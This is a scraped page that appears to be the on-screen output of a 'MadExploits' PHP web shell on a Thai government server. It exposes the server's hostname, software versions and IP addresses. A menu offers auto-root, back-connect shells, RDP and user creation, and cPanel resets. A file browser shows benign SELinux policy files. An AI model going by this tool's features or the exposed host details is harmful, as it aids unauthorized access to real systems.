Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
roles /
[ HOME SHELL ]
Name
Size
Permission
Action
auditadm.if
917
B
-rw-r--r--
dbadm.if
906
B
-rw-r--r--
guest.if
862
B
-rw-r--r--
logadm.if
897
B
-rw-r--r--
secadm.if
927
B
-rw-r--r--
staff.if
866
B
-rw-r--r--
sysadm.if
4.79
KB
-rw-r--r--
sysadm_secadm.if
36
B
-rw-r--r--
unconfineduser.if
14.21
KB
-rw-r--r--
unprivuser.if
885
B
-rw-r--r--
webadm.if
897
B
-rw-r--r--
xguest.if
866
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : guest.if
## <summary>Least privledge terminal user</summary> ######################################## ## <summary> ## Change to the guest role. ## </summary> ## <param name="role"> ## <summary> ## Role allowed access. ## </summary> ## </param> ## <rolecap/> # interface(`guest_role_change',` gen_require(` role guest_r; ') allow $1 guest_r; ') ######################################## ## <summary> ## Change from the guest role. ## </summary> ## <desc> ## <p> ## Change from the guest role to ## the specified role. ## </p> ## <p> ## This is an interface to support third party modules ## and its use is not allowed in upstream reference ## policy. ## </p> ## </desc> ## <param name="role"> ## <summary> ## Role allowed access. ## </summary> ## </param> ## <rolecap/> # interface(`guest_role_change_to',` gen_require(` role guest_r; ') allow guest_r $1; ')
Close